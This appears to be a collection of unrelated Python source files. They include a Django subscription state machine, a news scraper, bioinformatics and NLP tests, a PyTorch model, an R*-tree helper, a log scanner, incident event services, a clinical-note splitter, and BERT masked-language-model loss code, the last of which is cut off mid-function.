permissions = (("can_update_state", "Can update subscription state"),)
def __str__(self):
return "[{}] {}: {:%Y-%m-%d} to {:%Y-%m-%d}".format(
self.pk, self.get_state_display(), as_date(self.start), as_date(self.end)
)
def can_proceed(self, transition_method):
return can_proceed(transition_method)
@transition(field=state, source=State.ACTIVE, target=State.EXPIRING)
def cancel_autorenew(self):
self.reason = ""
@post_transition(cancel_autorenew)
def post_cancel_autorenew(self):
self.save()
signals.autorenew_canceled.send_robust(self)
@transition(field=state, source=State.EXPIRING, target=State.ACTIVE)
def enable_autorenew(self):
self.reason = ""
@post_transition(enable_autorenew)
def post_enable_autorenew(self):
self.save()
signals.autorenew_enabled.send_robust(self)
@transition(field=state, source=[State.ACTIVE, State.SUSPENDED], target=State.RENEWING)
def renew(self):
self.reason = ""
@post_transition(renew)
def post_renew(self):
self.save()
signals.subscription_due.send_robust(self)
@fsm_log_description
@transition(
field=state,
source=[State.ACTIVE, State.RENEWING, State.SUSPENDED, State.ERROR],
target=State.ACTIVE,
)
def renewed(self, new_end_date, new_reference, description=None):
self.reason = ""
self.end = new_end_date
self.reference = new_reference
@post_transition(renewed)
def post_renewed(self):
self.save()
signals.subscription_renewed.send_robust(self)
@fsm_log_description
@transition(field=state, source=[State.RENEWING, State.ERROR], target=State.SUSPENDED)
def renewal_failed(self, reason="", description=None):
if description:
self.reason = description
else:
self.reason = reason
@post_transition(renewal_failed)
def post_renewal_failed(self):
self.save()
signals.renewal_failed.send_robust(self)
@fsm_log_by
@fsm_log_description
@transition(
field=state,
source=[State.ACTIVE, State.SUSPENDED, State.EXPIRING, State.ERROR],
target=State.ENDED,
)
def end_subscription(self, reason="", by=None, description=None):
if description:
self.reason = description
else:
self.reason = reason
self.end = timezone.now()
@post_transition(end_subscription)
def post_end_subscription(self):
self.save()
signals.subscription_ended.send_robust(self)
@fsm_log_description
@transition(field=state, source=State.RENEWING, target=State.ERROR)
def state_unknown(self, reason="", description=None):
"""
An error occurred after the payment was signalled, but before the
subscription could be updated, so the correct state is unknown.
Requires manual investigation to determine the correct state from
here.
If a record remains in RENEWING state for longer than some timeout, the
record will be moved to this state.
"""
if description:
self.reason = description
else:
self.reason = reason
@post_transition(state_unknown)
def post_state_unknown(self):
self.save()
signals.subscription_error.send_robust(self)
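# A minimal usage sketch (assumptions: these manager methods are driven by a
# periodic task such as a cron-run management command, and the import path
# "subscriptions.models" is illustrative):
#
#   from subscriptions.models import Subscription
#
#   Subscription.objects.trigger_renewals()           # ACTIVE and past end -> renew()
#   Subscription.objects.trigger_expiring()           # EXPIRING and past end -> end_subscription()
#   Subscription.objects.trigger_suspended()          # SUSPENDED and past end -> retry renew()
#   Subscription.objects.trigger_suspended_timeout(timeout_hours=48)
#   Subscription.objects.trigger_stuck(timeout_hours=2)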
|
470958
|
import requests
from bs4 import BeautifulSoup
# this code will scrape data for the date entered by the user
print ("enter the date in DD/MM/YYYY")
date = input()
day = date[:2]
month = date[3:-5]
year = date[-4:]
# you can make the link dynamic by iterating it in a for loop
r = requests.get('http://www.business-standard.com/todays-paper/?print_dd='+day+'&print_mm='+month+'&print_yy='+year)
soup = BeautifulSoup(r.content,"html.parser")
#print (soup.prettify())
topBdata = soup.find_all ("div",{"class":"topB"})
#this data can be stored in csv format
for dataCluster in topBdata:
for data in dataCluster.find_all("ul",{"class":"aticle-txt"}):
print (data.text)
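# A minimal sketch of the CSV export hinted at above (assumptions: one headline
# per row, and the file name "headlines.csv" is illustrative):
#
#   import csv
#   with open('headlines.csv', 'w', newline='') as f:
#       writer = csv.writer(f)
#       for dataCluster in topBdata:
#           for data in dataCluster.find_all("ul", {"class": "aticle-txt"}):
#               writer.writerow([data.text.strip()])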
|
470985
|
from resolwe.flow.models import Data
from resolwe.test import tag_process
from resolwe_bio.utils.test import BioProcessTestCase
class CutAndRunTestCase(BioProcessTestCase):
@tag_process("workflow-cutnrun")
def test_cutnrun(self):
species = "Homo sapiens"
build = "custom_build"
with self.preparation_stage():
# Data is from chr17:3020000-3040800 of mouse genome (mm10).
reads = self.prepare_paired_reads(
mate1=["./workflow_cutnrun/input/chr17_cutnrun_1.fastq.gz"],
mate2=["./workflow_cutnrun/input/chr17_cutnrun_2.fastq.gz"],
)
ref_seq = self.run_process(
"upload-fasta-nucl",
{
                    # Mouse genome (mm10) prepared by cutting chr17 up to 3040800 bp.
"src": "./workflow_cutnrun/input/mm10_chr17_upto_3040800.fasta.gz",
"species": species,
"build": build,
},
)
bowtie2_index = self.run_process("bowtie2-index", {"ref_seq": ref_seq.id})
input_workflow = {
"reads": reads.id,
"options_aln_species": {
"genome": bowtie2_index.id,
},
"options_aln_spikein": {
"genome": bowtie2_index.id,
},
"options_sieve": {
"max_frag_length": 120,
},
"options_misc": {
"bw_binsize": 50,
"bw_timeout": 30,
},
}
self.run_process("workflow-cutnrun", input_workflow)
for data in Data.objects.all():
self.assertStatus(data, Data.STATUS_DONE)
cnr = Data.objects.last()
self.assertFile(
obj=cnr,
field_path="bigwig",
fn="./workflow_cutnrun/output/normalized.bigwig",
)
|
470993
|
import unittest
from aggregate.sequence_labeling import get_statistics as get_statistics_sl
from aggregate.text_classification import get_statistics as get_statistics_tc
from aggregate.text_matching import get_statistics as get_statistics_tm
from datalabs import load_dataset
class MyTestCase(unittest.TestCase):
def test_Data_featurize(self):
print("\n---- test aggregate operation ---")
# text classification
dataset = load_dataset("mr")
res = dataset["test"].apply(get_statistics_tc)
print(res._stat["dataset-level"]["length_info"]["max_text_length"])
self.assertEqual(
res._stat["dataset-level"]["length_info"]["max_text_length"], 61
)
# text matching
dataset = load_dataset("sick")
res = dataset["test"].apply(get_statistics_tm)
print(res._stat["dataset-level"]["length_info"]["max_text1_length"])
# self.assertEqual(res._stat["dataset-level"]["length_info"]
# ["max_text1_length"], 61)
# ner
dataset = load_dataset("conll2003", "ner")
print(get_statistics_sl)
print(get_statistics_sl._type)
res = dataset["test"].apply(get_statistics_sl)
print(res)
print(res._stat["dataset-level"]["length_info"]["max_text_length"])
# self.assertEqual(res._stat["dataset-level"]["length_info"]
# ["max_text_length"], 61)
if __name__ == "__main__":
unittest.main()
|
471044
|
from ft5406 import Touchscreen, TS_PRESS, TS_RELEASE, TS_MOVE
ts = Touchscreen()
def touch_handler(event, touch):
if event == TS_PRESS:
print("Got Press", touch)
if event == TS_RELEASE:
print("Got release", touch)
if event == TS_MOVE:
print("Got move", touch)
for touch in ts.touches:
touch.on_press = touch_handler
touch.on_release = touch_handler
touch.on_move = touch_handler
ts.run()
while True:
# Redraw Code etc
try:
pass
except KeyboardInterrupt:
ts.stop()
exit()
|
471060
|
import torch
import torch.nn as nn
from models.utils import create_mlp_components
__all__ = ['CenterRegressionNet']
class CenterRegressionNet(nn.Module):
blocks = (128, 128, 256)
def __init__(self, num_classes=3, width_multiplier=1):
super().__init__()
self.in_channels = 3
self.num_classes = num_classes
layers, channels = create_mlp_components(in_channels=self.in_channels, out_channels=self.blocks,
classifier=False, dim=2, width_multiplier=width_multiplier)
self.features = nn.Sequential(*layers)
layers, _ = create_mlp_components(in_channels=(channels + num_classes), out_channels=[256, 128, 3],
classifier=True, dim=1, width_multiplier=width_multiplier)
self.regression = nn.Sequential(*layers)
def forward(self, inputs):
coords = inputs['coords']
one_hot_vectors = inputs['one_hot_vectors']
assert one_hot_vectors.dim() == 2 # [B, C]
features = self.features(coords)
features = features.max(dim=-1, keepdim=False).values
return self.regression(torch.cat([features, one_hot_vectors], dim=1))
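# A minimal smoke-test sketch (assumptions inferred from the forward pass above,
# not from upstream docs: 'coords' is laid out as [batch, 3, num_points] so the
# shared MLP runs point-wise, 'one_hot_vectors' is [batch, num_classes], and the
# regression head emits one 3-D center per example):
#
#   net = CenterRegressionNet(num_classes=3)
#   coords = torch.randn(4, 3, 512)                      # hypothetical point batch
#   one_hot = torch.eye(3)[torch.randint(0, 3, (4,))]    # [4, 3] class vectors
#   center = net({'coords': coords, 'one_hot_vectors': one_hot})  # expected [4, 3]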
|
471086
|
from typing import Tuple
from .rect import Rect, union_all
from ..rtree import EntryDivision
class EntryDistribution:
"""
Represents a distribution of entries into two groups, where the order of entries in each group is not relevant.
This class is similar to the EntryDivision type alias, but contains additional helper methods for working with
the distribution (e.g., getting bounding rectangles for each group), as well as equality and hash operators so
the list of distributions can be used as part of a set (as required by RStarStat).
"""
def __init__(self, division: EntryDivision):
"""
        Creates an EntryDistribution from an EntryDivision.
:param division: Entry division. Note that an EntryDivision is nothing more than a type alias for a tuple
containing two lists of entries.
"""
self.division = division
self.set1 = set(division[0])
self.set2 = set(division[1])
r1 = union_all([e.rect for e in division[0]])
r2 = union_all([e.rect for e in division[1]])
self.overlap = r1.get_intersection_area(r2)
self.perimeter = r1.perimeter() + r2.perimeter()
def is_division_equivalent(self, division: EntryDivision) -> bool:
"""
Returns True if the given entry division may be considered equivalent (i.e., its two groups contain the same
entries, independent of the order of both the groups themselves, as well as the entries in each group).
:param division: Entry division
:return: True if the entry division may be considered equivalent to this distribution
"""
set1 = set(division[0])
set2 = set(division[1])
return (self.set1 == set1 and self.set2 == set2) or (self.set1 == set2 and self.set2 == set1)
def get_rects(self) -> Tuple[Rect, Rect]:
"""Returns the two rectangles corresponding to the bounding boxes of each group in the distribution."""
r1 = union_all([e.rect for e in self.division[0]])
r2 = union_all([e.rect for e in self.division[1]])
return r1, r2
def __eq__(self, other):
if isinstance(other, self.__class__):
return (self.set1 == other.set1 and self.set2 == other.set2) \
or (self.set1 == other.set2 and self.set2 == other.set1)
return False
def __ne__(self, other):
return not self == other
def __hash__(self):
return hash(frozenset([frozenset(self.set1), frozenset(self.set2)]))
def __repr__(self):
return f'RStarDistribution({[e.data for e in self.set1]}, {[e.data for e in self.set2]})'
|
471110
|
import logging
import os
import time
from pykit import fsutil
logger = logging.getLogger(__name__)
class ParseLogError(Exception):
pass
def build_entry(context, log_name, file_name, log_str, log_conf):
log_entry = {
'log_name': log_name,
'log_file': file_name,
'content': log_str,
'node_id': context['node_id'],
'node_ip': context['node_ip'],
'count': 1,
}
try:
log_info = log_conf['parse'](log_str)
except Exception as e:
logger.exception('failed to parse log: %s, %s, %s' %
(log_name, log_str, repr(e)))
        raise ParseLogError('failed to parse log: %s' % log_name)
log_entry.update(log_info)
return log_entry
def put_into_cache(log_cache, log_entry, merge=True, nlimit=None):
source_file = log_entry['source_file']
if not merge:
nlimit = nlimit or 10240
if source_file not in log_cache:
log_cache[source_file] = []
log_cache[source_file].append(log_entry)
if len(log_cache[source_file]) > nlimit:
log_cache[source_file] = log_cache[source_file][:nlimit]
return
log_ts = log_entry['log_ts']
line_number = log_entry['line_number']
if log_ts not in log_cache:
log_cache[log_ts] = {}
if source_file not in log_cache[log_ts]:
log_cache[log_ts][source_file] = {}
cache_source_file = log_cache[log_ts][source_file]
if line_number not in cache_source_file:
cache_source_file[line_number] = log_entry
return
old_entry = cache_source_file[line_number]
log_entry['count'] = old_entry['count'] + 1
cache_source_file[line_number] = log_entry
return
def _iter_log(log_conf):
file_path = log_conf['file_path']
log_lines = []
try:
for line in fsutil.Cat(file_path).iterate(
timeout=3, default_seek=-1024*1024*2):
if log_conf['is_first_line'](line):
if len(log_lines) > 0:
yield ''.join(log_lines)
log_lines = []
log_lines = [line]
else:
if len(log_lines) < 100:
log_lines.append(line)
except Exception as e:
logger.info('got exception: %s when iter lines of file: %s' %
(repr(e), file_path))
if len(log_lines) > 0:
yield ''.join(log_lines)
def iter_log(log_conf):
while True:
for log_str in _iter_log(log_conf):
yield log_str
time.sleep(1)
def _scan(context, log_name):
log_stat = context['stat'][log_name]
log_conf = context['conf'][log_name]
log_cache = context['cache'][log_name]
file_path = log_conf['file_path']
file_name = os.path.basename(file_path)
log_stat['total_n'] = 0
log_stat['reported_n'] = 0
for log_str in iter_log(log_conf):
log_str = log_str[:10240]
log_stat['total_n'] += 1
log_level = log_conf['get_level'](log_str)
if log_level not in log_conf['level']:
continue
log_entry = build_entry(context, log_name, file_name,
log_str, log_conf)
log_stat['latence'] = time.time() - log_entry['log_ts']
log_stat['reported_n'] += 1
cache_nlimit = log_conf.get("cache_nlimit", None)
merge = log_conf.get("merge", True)
with context['cache_lock']:
put_into_cache(log_cache, log_entry, merge, cache_nlimit)
def scan(context, log_name):
while True:
try:
_scan(context, log_name)
except Exception as e:
logger.exception('failed to scan log: %s, %s' %
(log_name, repr(e)))
context['stat'][log_name]['error'] = repr(e)
time.sleep(1)
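# A minimal sketch of the structures this module expects; the field names come
# from the accesses above, while the concrete values and helper functions
# (parse_fn, is_first_fn, get_level_fn) are illustrative assumptions:
#
#   log_conf = {
#       'file_path': '/var/log/app/error.log',
#       'level': ('warning', 'error'),
#       'parse': parse_fn,             # str -> dict with 'log_ts', 'line_number', 'source_file', ...
#       'is_first_line': is_first_fn,  # str -> bool, detects the start of a log record
#       'get_level': get_level_fn,     # str -> level string
#       'merge': True,                 # optional
#       'cache_nlimit': 10240,         # optional, only used when merge is False
#   }
#   context = {
#       'node_id': 'node-1', 'node_ip': '10.0.0.1',
#       'conf': {'app': log_conf}, 'stat': {'app': {}}, 'cache': {'app': {}},
#       'cache_lock': threading.Lock(),
#   }
#   scan(context, 'app')  # typically run in a dedicated thread per log_name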
|
471131
|
from typing import List, Optional
from uuid import uuid4
import datetime
import logging
from dispatch.incident import service as incident_service
from dispatch.individual import service as individual_service
from .models import Event, EventCreate, EventUpdate
logger = logging.getLogger(__name__)
def get(*, db_session, event_id: int) -> Optional[Event]:
"""Get an event by id."""
return db_session.query(Event).filter(Event.id == event_id).one_or_none()
def get_by_incident_id(*, db_session, incident_id: int) -> List[Optional[Event]]:
"""Get events by incident id."""
return db_session.query(Event).filter(Event.incident_id == incident_id)
def get_all(*, db_session) -> List[Optional[Event]]:
"""Get all events."""
return db_session.query(Event)
def create(*, db_session, event_in: EventCreate) -> Event:
"""Create a new event."""
event = Event(**event_in.dict())
db_session.add(event)
db_session.commit()
return event
def update(*, db_session, event: Event, event_in: EventUpdate) -> Event:
"""Updates an event."""
event_data = event.dict()
update_data = event_in.dict(skip_defaults=True)
for field in event_data:
if field in update_data:
setattr(event, field, update_data[field])
db_session.commit()
return event
def delete(*, db_session, event_id: int):
"""Deletes an event."""
event = db_session.query(Event).filter(Event.id == event_id).first()
db_session.delete(event)
db_session.commit()
def log(
db_session,
source: str,
description: str,
incident_id: int,
individual_id: int = None,
    started_at: datetime.datetime = None,
    ended_at: datetime.datetime = None,
details: dict = None,
) -> Event:
"""Logs an event."""
uuid = uuid4()
if not started_at:
started_at = datetime.datetime.utcnow()
if not ended_at:
ended_at = started_at
event_in = EventCreate(
uuid=uuid,
started_at=started_at,
ended_at=ended_at,
source=source,
description=description,
details=details,
)
event = create(db_session=db_session, event_in=event_in)
incident = incident_service.get(db_session=db_session, incident_id=incident_id)
incident.events.append(event)
db_session.add(incident)
if individual_id:
individual = individual_service.get(
db_session=db_session, individual_contact_id=individual_id
)
individual.events.append(event)
db_session.add(individual)
db_session.commit()
logger.info(f"{source}: {description}")
return event
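# A minimal usage sketch of log() (assumptions: db_session and the incident come
# from the caller's context; the source and description strings are illustrative):
#
#   log(
#       db_session=db_session,
#       source="Dispatch Core App",
#       description="Incident review document created",
#       incident_id=incident.id,
#   )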
|
471161
|
import regex
import logging
def normalize_date(date, id_, start, end):
""" Normalizes different dates encountered in the clinical notes.
Current accepted formats:
        28 Feb 2013 04:50
Thu 28 Feb 2013 04:50
28-Feb-2013 04:50
Output:
28 Feb 2013 04:50
"""
if '-' in date:
date = date.replace("-", " ").strip()
elif date.strip()[0].isalpha():
date = date[date.index(' '):].strip()
elif date.strip()[0].isnumeric():
# all good
date = date.strip()
else:
logging.warning("Unsupported date format: %s for id: %s with start: %s, end: %s", date, id_, start, end)
return None
return date
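# Illustrative examples of the accepted inputs (id_, start and end are only used
# for the warning log, so the placeholder values here are arbitrary):
#
#   normalize_date("28-Feb-2013 04:50", "note-1", 0, 17)      -> "28 Feb 2013 04:50"
#   normalize_date("Thu 28 Feb 2013 04:50", "note-1", 0, 21)  -> "28 Feb 2013 04:50"
#   normalize_date("28 Feb 2013 04:50", "note-1", 0, 17)      -> "28 Feb 2013 04:50"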
def split_one_note(id_, text):
""" Splits the text of one note by date.
Return:
split_note (List[Dict]):
Returns a list of dictionary in the format: {'start': <start char of the specific note in the big one>,
'end': <end char of the specifc note in the big one>,
'text': <text of the specific note>,
'date': <date of the specific note>}
"""
r = r'\n\w{0,5}\s*\d{1,2}(\s|-)[a-zA-Z]{3,5}(\s|-)\d{4}\s+\d{2}\:\d{2}'
dates = regex.finditer(r, text)
start = 0
end = -1
split_note = []
previous_date = None
for date in dates:
if start == 0:
start = date.span()[0]
previous_date = date.captures()[0]
elif previous_date is None or date.captures()[0] != previous_date:
end = date.span()[0]
note_text = text[start:end]
if 'entered on -' in note_text.lower():
if len(regex.findall(r'entered on -', note_text)) > 1:
logging.warning("Possible problems for span with start: %s and end: %s for note with id: %s", start, end, id_)
split_note.append({'start': start, 'end': end, 'text': note_text, 'date': normalize_date(previous_date, id_, start, end)})
start = end
previous_date = date.captures()[0]
# Add the last note
if previous_date is not None and 'entered on -' in text[start:].lower():
split_note.append({'start': start, 'end': len(text), 'text': text[start:], 'date': normalize_date(previous_date, id_, start, len(text))})
else:
logging.warning("No date/entered-on detected for id: %s wth start: %s, end: %s and text:\n%s...", id_, start, end, text[0:300])
return split_note
def split_clinical_notes(clinical_notes):
""" Splits clinical notes.
Args:
clinical_notes(dict):
Dictionary in the form {<clinical_note_id>: <text>, ...}
"""
split_notes = {}
for id_text, text in clinical_notes.items():
split_notes[id_text] = split_one_note(id_text, text)
return split_notes
|
471172
|
from utils.bert import bert_utils
from utils.bert import bert_modules
import numpy as np
import collections
import copy
import json
import math
import re
import six
import tensorflow as tf
from loss import loss_utils
from loss.entfox import sparse_entmax15_loss_with_logits, entmax15_loss_with_logits
def check_tf_version():
version = tf.__version__
print("==tf version==", version)
if int(version.split(".")[0]) >= 2 or int(version.split(".")[1]) >= 15:
return True
else:
return False
def normalizing(x, axis):
norm = tf.sqrt(tf.reduce_sum(tf.square(x), axis=axis, keep_dims=True))
normalized = x / (norm+1e-10)
return normalized
def get_masked_lm_output_v1(config, input_tensor,
output_weights,
output_target,
output_target_mask,
output_target_mapping,
**kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
if output_target_mapping is not None:
# [batch_size, num_predict, hidden_dims]
if check_tf_version():
input_tensor = tf.einsum("...id,...ki->...kd", input_tensor, output_target_mapping)
else:
input_tensor = tf.einsum("aid,aki->akd", input_tensor, output_target_mapping)
tf.logging.info("==using target output_target_mapping input==")
else:
tf.logging.info("==using whole sentence input==")
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
if embedding_projection is not None:
# batch x seq x hidden, embedding x hidden
print(input_tensor.get_shape(), embedding_projection.get_shape())
input_tensor = tf.einsum("abc,dc->abd", input_tensor, embedding_projection)
else:
print("==no need for embedding projection==")
input_tensor = input_tensor
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
# [batch, num_predict, embedding]
logits = tf.einsum("abc,dc->abd", input_tensor, output_weights)
logits = tf.nn.bias_add(logits, output_bias)
if kargs.get("pretrain_loss_type", "normal") == "normal":
# [batch, num_predict]
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(output_target),
)
per_example_loss *= output_target_mask
loss = tf.reduce_sum(per_example_loss) / (1e-10 + tf.reduce_sum(output_target_mask))
tf.logging.info("**** normal mlm loss ****")
elif kargs.get("pretrain_loss_type", "normal") == "gradient_penalty":
log_probs = tf.nn.log_softmax(logits, axis=-1)
# [batch_size*num_predict]
label_ids = tf.reshape(output_target, [-1])
# [batch_size*num_predict]
label_weights = tf.reshape(output_target_mask, [-1])
# [batch_size*num_predict, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*num_predict, vocab_size]
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
# output_weights is embedding_matrix
gp = tf.reduce_sum(tf.gradients(loss, [output_weights])[0]**2)
loss += 0.5 * kargs.get('epsilon', 1.0) * gp
tf.logging.info("**** normal mlm loss with gradient penalty ****")
else:
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
            labels=tf.stop_gradient(output_target),
)
per_example_loss *= output_target_mask
loss = tf.reduce_sum(per_example_loss) / (1e-10 + tf.reduce_sum(output_target_mask))
tf.logging.info("**** normal mlm loss ****")
return (loss, per_example_loss, logits, output_target_mask)
def get_masked_lm_output(config, input_tensor, output_weights, positions,
label_ids, label_weights, **kargs):
"""Get loss and log probs for the masked LM."""
reuse = kargs.get('reuse', False)
input_tensor = tf.cast(input_tensor, tf.float32)
positions = tf.cast(positions, tf.int32)
label_ids = tf.cast(label_ids, tf.int32)
label_weights = tf.cast(label_weights, tf.float32)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm scope **** %s", str(scope))
# if config.get("embedding", "factorized") == "factorized":
# projection_width = config.hidden_size
# else:
# projection_width = config.embedding_size
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
input_tensor = bert_utils.gather_indexes(input_tensor, positions)
"""
flatten masked lm ids with positions
"""
# with tf.variable_scope("cls/predictions", reuse=reuse):
with tf.variable_scope(scope, reuse=reuse):
# We apply one more non-linear transformation before the output layer.
# This matrix is not used after pre-training.
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
input_tensor = bert_modules.layer_norm(input_tensor)
# The output weights are the same as the input embeddings, but there is
# an output-only bias for each token.
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
label_ids = tf.reshape(label_ids, [-1])
label_weights = tf.reshape(label_weights, [-1])
if kargs.get("pretrain_loss_type", "normal") == "entmax":
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
per_example_loss = entmax15_loss_with_logits(one_hot_labels, logits)
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
tf.logging.info("**** entmax for mlm loss ****")
elif kargs.get("pretrain_loss_type", "normal") == "normal":
one_hot_labels = tf.one_hot(
label_ids, depth=config.vocab_size, dtype=tf.float32)
# per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
# labels=tf.stop_gradient(label_ids),
# logits=logits)
per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
numerator = tf.reduce_sum(label_weights * per_example_loss)
denominator = tf.reduce_sum(label_weights) + 1e-5
# The `positions` tensor might be zero-padded (if the sequence is too
# short to have the maximum number of predictions). The `label_weights`
# tensor has a value of 1.0 for every real prediction and 0.0 for the
# padding predictions.
# per_example_loss = -tf.reduce_sum(log_probs * one_hot_labels, axis=[-1])
# numerator = tf.reduce_sum(label_weights * per_example_loss)
# denominator = tf.reduce_sum(label_weights) + 1e-5
loss = numerator / denominator
tf.logging.info("**** normal loss for mlm loss ****")
if kargs.get("pretrain_loss_type", "normal") == "gradient_penalty":
# output_weights is embedding_matrix
gp = tf.reduce_sum(tf.gradients(loss, [output_weights])[0]**2)
loss += 0.5 * kargs.get('epsilon', 1.0) * gp
tf.logging.info("**** normal mlm loss with gradient penalty ****")
return (loss, per_example_loss, log_probs, label_weights)
def get_next_sentence_output(config, input_tensor, labels, reuse=None, **kargs):
"""Get loss and log probs for the next sentence prediction."""
# Simple binary classification. Note that 0 is "next sentence" and 1 is
# "random sentence". This weight matrix is not used after pre-training.
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/seq_relationship'
else:
scope = 'cls/seq_relationship'
tf.logging.info("**** nsp scope **** %s", str(scope))
# with tf.variable_scope("cls/seq_relationship", reuse=reuse):
with tf.variable_scope(scope, reuse=reuse):
output_weights = tf.get_variable(
"output_weights",
shape=[2, config.hidden_size],
initializer=bert_modules.create_initializer(config.initializer_range))
output_bias = tf.get_variable(
"output_bias", shape=[2], initializer=tf.zeros_initializer())
logits = tf.matmul(input_tensor, output_weights, transpose_b=True)
logits = tf.nn.bias_add(logits, output_bias)
log_probs = tf.nn.log_softmax(logits, axis=-1)
labels = tf.reshape(labels, [-1])
one_hot_labels = tf.one_hot(labels, depth=2, dtype=tf.float32)
per_example_loss = -tf.reduce_sum(one_hot_labels * log_probs, axis=-1)
loss = tf.reduce_mean(per_example_loss)
return (loss, per_example_loss, log_probs)
def seq_mask_masked_lm_output(config, input_tensor, output_weights,
input_mask, input_ori_ids, input_ids,
sampled_binary_mask, **kargs):
input_shape_list = bert_utils.get_shape_list(input_tensor, expected_rank=3)
batch_size = input_shape_list[0]
seq_length = input_shape_list[1]
hidden_dims = input_shape_list[2]
embedding_projection = kargs.get('embedding_projection', None)
scope = kargs.get('scope', None)
if scope:
scope = scope + '/' + 'cls/predictions'
else:
scope = 'cls/predictions'
tf.logging.info("**** mlm generator scope **** %s", str(scope))
# with tf.variable_scope("cls/predictions", reuse=tf.AUTO_REUSE):
with tf.variable_scope(scope, reuse=tf.AUTO_REUSE):
if config.get('ln_type', 'postln') == 'preln':
input_tensor = bert_modules.layer_norm(input_tensor)
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = input_tensor
else:
input_tensor = input_tensor
# if config.get("embedding", "factorized") == "factorized":
# projection_width = config.hidden_size
# else:
# projection_width = config.embedding_size
if config.get("embedding", "none_factorized") == "none_factorized":
projection_width = config.hidden_size
tf.logging.info("==not using embedding factorized==")
else:
projection_width = config.get('embedding_size', config.hidden_size)
tf.logging.info("==using embedding factorized: embedding size: %s==", str(projection_width))
with tf.variable_scope("transform"):
input_tensor = tf.layers.dense(
input_tensor,
units=projection_width,
activation=bert_modules.get_activation(config.hidden_act),
kernel_initializer=bert_modules.create_initializer(
config.initializer_range))
if config.get('ln_type', 'postln') == 'preln':
input_tensor = input_tensor
elif config.get('ln_type', 'postln') == 'postln':
input_tensor = bert_modules.layer_norm(input_tensor)
else:
input_tensor = bert_modules.layer_norm(input_tensor)
if embedding_projection is not None:
# batch x seq x hidden, embedding x hidden
print(input_tensor.get_shape(), embedding_projection.get_shape())
input_tensor = tf.einsum("abc,dc->abd", input_tensor, embedding_projection)
else:
print("==no need for embedding projection==")
input_tensor = input_tensor
output_bias = tf.get_variable(
"output_bias",
shape=[config.vocab_size],
initializer=tf.zeros_initializer())
# batch x seq x embedding
logits = tf.einsum("abc,dc->abd", input_tensor, output_weights)
logits = tf.nn.bias_add(logits, output_bias)
"""
if input_ori_ids[i] is random pertubated, sampled_binary_mask[i]=1
"""
sampled_binary_mask = tf.cast(sampled_binary_mask, tf.float32)
input_mask = tf.cast(input_mask, tf.float32)
sampled_binary_mask *= input_mask
if kargs.get("pretrain_loss_type", "normal") == "normal":
per_example_loss = tf.nn.sparse_softmax_cross_entropy_with_logits(
logits=logits,
labels=tf.stop_gradient(input_ori_ids),
)
per_example_loss *= sampled_binary_mask
loss = tf.reduce_sum(per_example_loss) / (1e-10 + tf.reduce_sum(sampled_binary_mask))
tf.logging.info("**** normal mlm loss ****")
elif kargs.get("pretrain_loss_type", "normal") == "gradient_penalty":
log_probs = tf.nn.log_softmax(logits, axis=-1)
# [batch_size*seq_len]
label_ids = tf.reshape(input_ori_ids, [-1])
# [batch_size*seq_len]
label_weights = tf.reshape(sampled_binary_mask, [-1])
# [batch_size*seq_len, vocab_size]
log_probs = tf.reshape(log_probs, [-1, config.vocab_size])
# [batch_size*seq_len, vocab_size]
one_hot_labels = tf.one_hot(
